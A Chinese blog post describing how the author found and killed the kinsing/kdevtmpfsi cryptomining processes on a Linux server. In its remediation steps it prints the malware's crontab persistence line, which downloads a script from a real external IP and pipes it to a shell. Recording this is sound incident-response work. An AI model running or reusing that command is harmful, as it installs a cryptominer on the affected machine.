1. 全栈程序员必看首页

linux 中了挖矿病毒

全栈程序员-站长 未分类 阅读 47

linux 中了挖矿病毒文章目录中毒特征磁盘cpu跑满100%如何处理反复发作中毒特征磁盘cpu跑满100%如何处理电脑中了挖矿病毒ps-aux|grepkinsingroot194470.01.811917235084?Sl4月150:04/var/tmp/kinsingroot272470.00.0112728…

大家好,又见面了,我是你们的朋友全栈君。

文章目录

中毒特征磁盘cpu 跑满 100%

在这里插入图片描述

如何处理

电脑中了挖矿病毒

ps -aux | grep kinsing
root     19447  0.0  1.8 119172 35084 ?        Sl   415   0:04 /var/tmp/kinsing
root     27247  0.0  0.0 112728   972 pts/0    D+   07:47   0:00 grep --color=auto kinsing


ps -aux | grep kdevtmpfsi
root     25493 94.7  0.0 515448  1620 ?        Ssl  07:46   1:17 /tmp/kdevtmpfsi
root     27249  0.0  0.0 112728   980 pts/0    R+   07:47   0:00 grep --color=auto kdevtmpfsi


pkill -9 kinsing
pkill -9 kdevtmpfsi

反复发作

#杀掉以后还会换端口
pkill -9 kinsing
[root@localhost tmp]# ps -aux | grep kinsing
root      6087  0.0  0.0 112728   976 pts/0    S+   07:56   0:00 grep --color=auto kinsing

查看定时任务
crontab -l
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1
 
 pkill -9 kinsing
 ps -aux | grep kinsing
终于删掉了
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/133160.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • HTML5:移动端开发入门[通俗易懂]

    HTML5:移动端开发入门[通俗易懂]

    HTML5:移动端开发入门[通俗易懂]HTML5:移动端开发入门一、前言常见的移动端开发分为移动版网站和响应式设计。移动端开发可以让技术人员专注于移动端的页面优化,而无需在意桌面版的兼容,但页面一旦改动内容,维护成本就翻倍了;响应式设计让开发人员只需维护一份项目,节省开发和维护成本,不过缺点是需要做好移动端和桌面端的兼容,也十分考验页面设计。两种开发方式孰强孰弱,暂无定论,本博客主要探讨一下移动端开发的技巧。二、移动端开发技巧1.Viewport设置传统桌面端网站的显示窗口往往都是在1024X768的分

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月21日
    31
  • ubuntu安装gcc和g++

    ubuntu安装gcc和g++

    ubuntu安装gcc和g++依赖包含gcc和g++,只需一行命令即可sudoapt-getinstallbuild-essential查看版本g++–versiongcc–version

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月24日
    12
  • 权限持久化—映像劫持检测(Shift后门)[通俗易懂]

    权限持久化—映像劫持检测(Shift后门)[通俗易懂]

    权限持久化—映像劫持检测(Shift后门)[通俗易懂]映像劫持说白了还是利用了windows的一些特性,当你点击可执行文件进行执行时,系统并不会直接就对可执行文件进行执行,而是首先对注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions,这个路径下面如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。比较常用的是.

    全栈程序员-站长的头像 全栈程序员-站长
    2025年12月16日
    1
  • Oracle创建表空间、创建用户、授予权限、锁定、解锁以及删除用户等[通俗易懂]

    Oracle创建表空间、创建用户、授予权限、锁定、解锁以及删除用户等[通俗易懂]

    Oracle创建表空间、创建用户、授予权限、锁定、解锁以及删除用户等[通俗易懂]Oracle创建表空间、创建用户、授予权限以及删除用户等–创建表空间CREATETABLESPACEcaiylDATAFILE’D:\Oracle\app\caiyl\oradata\orcl\caiyl_space.dbf’size500mAUTOEXTENDONNEXT200MMAXSIZE20480MEXTENTMANAGEMENTLOCAL;

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月16日
    13
  • Java基础学习总结(20)——基础语法

    Java基础学习总结(20)——基础语法

    Java基础学习总结(20)——基础语法Java基础学习总结(20)——基础语法

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月22日
    45
  • 指令的四个周期_cpu指令周期流程图

    指令的四个周期_cpu指令周期流程图

    指令的四个周期_cpu指令周期流程图指令流程图的概念菱形:译码,测试,表示判断,如零指令字是0或者1.与前面的CPU周期紧密相连,不单独占用CPU周期。每个方框箭头下面的是公共操作符符号,表示一条指令结束。mov指令将R1寄存器的数据存储到R2寄存器中,lad指令时间主存中的数据存储到寄存器中。sto是将R2中的数据根据R3中的主存地址存储到主存中。lad和sto是寄存器-主存指令需要三个CPU周期,其他都是寄存器-…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月13日
    4

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号